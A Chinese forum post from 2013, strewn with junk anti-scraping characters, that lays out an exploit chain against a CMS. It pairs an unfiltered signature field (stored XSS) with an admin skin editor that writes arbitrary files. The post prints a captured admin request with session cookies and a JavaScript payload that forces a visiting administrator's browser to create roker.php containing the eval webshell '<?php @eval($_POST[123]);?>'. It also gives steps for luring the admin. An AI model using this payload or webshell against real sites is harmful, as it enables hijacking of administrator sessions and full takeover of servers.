|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题8 S9 D0 Z" Z/ N- }
官网已经修补了,所以重新下了源码
9 d8 a0 v% ]( `1 \因为 后台登入 还需要认证码 所以 注入就没看了。
+ R6 d4 Z- p/ X存在 xss' I# y6 ~5 y% p- Y9 v: o C
漏洞文件 user/member/skin_edit.php5 U, m. E6 k" K! g6 Y! a3 o3 U
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:$ Y, F: O# a9 h2 K' R3 k
$ I! F; g( P# R# K" Y
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
+ k* x$ t6 |& `' U " B* ]: x1 [% y7 F) ~$ f" u% \/ y
</textarea></td></tr>
3 A2 I' ^3 m" _) p# z* }6 U7 b/ S
2 d! [7 w& j, w user/do.php
7 m% r1 W3 k1 f2 t, m1 ^9 J" A1 r( S# v) k3 r* _
) e7 O1 h0 r! s6 C1 g) W" Xif($op=='zl'){ //资料7 z) f& o3 Q1 I, J9 j; ?
! c! v2 c7 C2 a9 {3 j6 G if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) ! j& j" T* k* ~2 D
exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
5 E# n5 w9 {. f , Z. T( _! u( f6 u" o5 f
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
/ B6 `/ C6 s. D ) Y& ]; S- b; v& t, Y0 h
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."' U- b$ ^* {! V% d9 `
where CS_Name='".$cscms_name."'";
: u3 T5 @& L8 r$ A0 { + X y4 @; b. E5 l, M
if($db->query($sql)){' s2 m8 Z& @- j! x4 z
- N7 N' i3 D$ P4 {4 F( u
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
) a6 P( O( [6 y - I2 c: F6 i: z# w% G! g
}else{6 V* C1 C! _* N9 Z& E
( u0 S! ~9 _# G exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
+ d+ o( q% v& i; y) P4 z f3 b ; K% n! |4 `/ q# T
}
& ^$ p# }4 Z3 K% {. j7 V- m% c A* }6 ]8 M, J
a: W8 N8 Q, L" v( q3 u, e没有 过滤导致xss产生。. Q2 {3 z5 B& r( @
后台 看了下 很奇葩的是可以写任意格式文件。。
, m4 r9 S+ f- E& M抓包。。
1 F$ K9 ~* L/ W' X0 o( u! y3 y x5 O; C+ J- Z
1 G" N6 |0 D2 `
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
4 ^( b# Q6 E9 N" ^% _$ d7 h * O6 V) q1 B5 v Q* k5 c6 i5 ?; ~
Accept: text/html, application/xhtml+xml, */*6 o0 z. a0 J0 r* d9 _. D' ]: ]) W
. z+ l2 j8 O" g& y+ l! S
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
* B, s8 T6 Q3 ]1 R* B3 [ ! M6 H, a/ J- Z+ E: h* C, B
Accept-Language: zh-CN
z+ e! N, u3 h ! R, p- Y; i9 ]& Q3 U/ F U* L
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)1 D4 N Z; {7 a9 _& r- ~
3 V& K7 E i; v" ?+ p9 N3 ?) z
Content-Type: application/x-www-form-urlencoded
* J8 s) i4 j$ z' w* ` w4 T5 o ( f" q( J$ L9 l8 y
Accept-Encoding: gzip, deflate2 X1 r: _8 y1 F" ~& E& F
- B9 g+ e! ]4 q7 ]! d1 e( O$ \Host: 127.0.0.17 d# c$ f! E7 q9 s- p! u2 f6 ^
9 c/ L6 L; b( P( B: F0 H, ^
Content-Length: 38 E9 G1 m# X2 {
4 ?, T9 Y5 e/ t6 j% t% E9 b
DNT: 1
/ y, P! _3 }" X# V ' |# ]) Z, z/ x* J% k
Connection: Keep-Alive
$ p0 Q" j8 m" E& U2 n' O7 {
& y) M) ^+ L( o9 F& YCache-Control: no-cache% O" i. Z7 ]- I. k7 d1 k0 J% X& u
; p% b! @; D( c( L7 Y# qCookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594) q7 R# T7 v4 _, a& M
9 J7 {7 v* `) A; Q/ F
# C# |9 l, s+ F: a4 R* k! n! s4 Ename=aaa.php&content=%3Cs%3E%3Ca%25%3E2 N+ Z, T. N9 L% X
1 L. d: ?5 l% S/ D# t# J# n
* ^4 R1 R! D9 I. Q) \" j B5 f1 @* d" d
于是 构造js如下。, e6 a: F; Z/ ~
7 [ q8 ~! l% S7 c% C4 C
本帖隐藏的内容<script>
7 k' T) \* c9 J LthisTHost = top.location.hostname;
|( L+ X* H! j4 I w( H 0 A4 k# A* k# k4 i' N* B8 [# g3 Q
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
2 z. z- ~7 ]1 @! w
; y; Q" g8 U) `4 pfunction PostSubmit(url, data, msg) { ( f# w# j @" a
var postUrl = url;1 R& }+ s2 c+ ?
" j( L1 Z- X9 W6 D
var postData = data;
' l. h' J! [& J& q4 a1 { var msgData = msg;
! E% F& z1 Y: {1 w/ M& E g [8 B var ExportForm = document.createElement("FORM"); 0 x; j0 a% N) U6 G& A/ b
document.body.appendChild(ExportForm); 2 T0 \2 ~# a& m3 H
ExportForm.method = "POST"; ) c& f0 d" A& M6 I" e* d
var newElement = document.createElement("input"); 4 J5 X3 t2 Z5 U% x* n
newElement.setAttribute("name", "name"); * ]0 W; Y: m f3 |' s" ], ~* G
newElement.setAttribute("type", "hidden"); 6 D! y1 F; s* S: t8 ?' M8 j
var newElement2 = document.createElement("input");
1 R& Y& w8 B) D& B newElement2.setAttribute("name", "content"); 4 l T: c$ j, L; ]: V) V+ X2 w
newElement2.setAttribute("type", "hidden");
' B I. y4 @: l5 z+ Q ExportForm.appendChild(newElement);
8 f9 @6 O$ b0 a9 p: T ExportForm.appendChild(newElement2);
2 Y. p- P1 }( q$ q! Z* A newElement.value = postData; ; ]# k( B! S' y, B1 Q9 n" u
newElement2.value = msgData;
1 t9 K! N! J; b9 ^# m ExportForm.action = postUrl;
9 a O# t2 z- y/ |% L ExportForm.submit(); , j; r" O: m/ o: X4 R
};, Q3 r, B9 a0 K# H( X) c" X
; t! S4 i& B2 N
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
. L# A( c1 p& H9 e. B. @
* s7 b) ~1 E% A7 b</script>6 s" n. n+ A/ x
. ]2 Z, }) m( u' m: V4 K/ r8 n% u7 p Q1 x3 A, G2 ~8 e0 D# }& d8 c
& x6 ^9 m( R, R- ]$ }http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
* }. l# \& @0 c0 Y! \. q) T% F; Q9 h用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)/ @% h3 ^! o2 w" I
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
; C: H+ }5 ?6 l% q2 l7 F |
|
发表于 2013-11-6 18:09:37
收藏
支持
反对